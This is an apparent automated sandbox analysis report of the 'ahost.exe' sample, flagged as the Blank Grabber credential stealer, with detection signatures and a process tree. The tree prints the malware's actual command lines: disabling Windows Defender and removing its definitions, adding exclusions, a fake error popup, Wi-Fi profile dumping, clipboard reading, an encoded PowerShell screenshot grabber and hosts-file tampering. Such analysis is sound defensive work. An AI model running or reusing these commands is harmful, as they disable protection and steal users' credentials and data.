Edit tour

Windows Analysis Report
ahost.exe

Overview

General Information

Sample name:	ahost.exe
Analysis ID:	1574323
MD5:	b5fc1d627d4db7ee46dc0fe38ac28d01
SHA1:	35e2fa322989afa985734caa7c663510de21a2cc
SHA256:	0f145a4d00566964b14e9b825779fd1aae1ea308a36e9d3536534779e19d64a1
Tags:	exegithub-com--hombozuser-JAMESWT_MHT
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Writes or reads registry keys via WMI

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

ahost.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\ahost.exe" MD5: B5FC1D627D4DB7EE46DC0FE38AC28D01)

ahost.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\ahost.exe" MD5: B5FC1D627D4DB7EE46DC0FE38AC28D01)

cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7608 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7600 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 5732 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7572 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7616 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7664 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7776 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8032 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8168 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 5760 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3616 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7228 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2656 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 872 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 356 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 2240 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 740 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 2508 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3968 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 1292 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7316 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7312 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7292 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8032 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7668 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7988 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 6620 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7612 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2844 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7440 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 2572 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 4700 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 2656 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 5640 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

